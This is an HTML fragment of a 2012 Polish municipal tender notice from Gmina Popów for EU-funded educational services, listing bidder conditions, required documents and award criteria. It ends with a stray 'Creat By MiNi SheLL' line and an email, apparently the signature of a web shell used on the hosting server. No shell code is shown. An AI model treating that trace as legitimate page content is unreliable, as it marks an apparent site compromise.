<ul class="kh_indent_1"><li><p>a.	wykonawca udokumentuje, że brał czynny udział w realizacji lub współrealizacji projektów finansowanych lub współfinansowanych przez Unię Europejską w okresie poprzedzającym upływ terminu składania ofert, w których przedmiotem realizacji były usługi o charakterze podobnym rodzajowo do przedmiotu zamówienia, tj. podpadające pod kody CPV 80100000-5 - 80660000-8 - usługi edukacyjne lub szkoleniowe, a wartość jednego z tych projektów wynosiła co najmniej 100 tyś zł brutto. Kryterium oceny stanowi łączna ilość (liczba) projektów, która zostanie poddana ocenie* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1b</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy potwierdzające, że posiadają one wykształcenie kierunkowe właściwe dla świadczonej usługi* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c
d.	oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy potwierdzające, że odbyli Oni przeszkolenie z zasad postępowania z dziećmi ze szkół podstawowych  w zakresie prowadzenia zajęć edukacyjnych z zakresu przedmiotu zamówienia, uprawdopodobniające że Wykonawca daje rękojmię należytego wykonania zamówienia, (np. certyfikat, zaświadczenie od podmiotu przeprowadzającego przeszkolenie, szkolenie, kurs lub równoważne zajęcia w tym zakresie)* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c
e.	oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy - jeśli osoby te dysponują potwierdzeniem odbycia tego typu przeszkolenia, potwierdzające, że odbyli Oni przeszkolenie w zakresie równości szans - zasada równości szans kobiet i mężczyzn (np. certyfikat, zaświadczenie od podmiotu przeprowadzającego przeszkolenie, szkolenie, kurs lub równoważne zajęcia w tym zakresie)* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>aktualną informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, min. na 100 tys. zł, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 30</li>
<li>3 - kawlifikacje - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gminapopow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Popów z/s Zawady ul. Częstochowska 6 42-110 Popów pok. 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2012 godzina 10:00, miejsce: Gmina Popów z/s Zawady ul. Częstochowska 6 42-110 Popów pok.12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizaowane w ramach POKL finansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com